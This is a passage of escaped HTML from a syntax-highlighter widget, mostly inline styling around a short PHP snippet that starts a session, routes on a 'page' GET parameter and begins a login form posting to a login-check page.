inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;94&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-95&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;95&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-96&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;96&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-97&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;97&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-98&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;98&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-99&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;99&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-100&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;100&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-101&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;101&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-102&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;102&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-103&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;103&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-104&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;104&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-105&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;105&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-106&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;106&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-107&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;107&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-108&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;108&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-109&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;109&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-110&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;110&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-111&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;111&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-112&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;112&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-113&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;113&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 990.4px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;session_start&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;5f0c2baaa2c0426eed9a958e3fe0ff94.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'page'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;login&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;Login&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;form &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./?page=login_chk&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;method&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;POST&quot;&lt;/span&gt;&lt;span 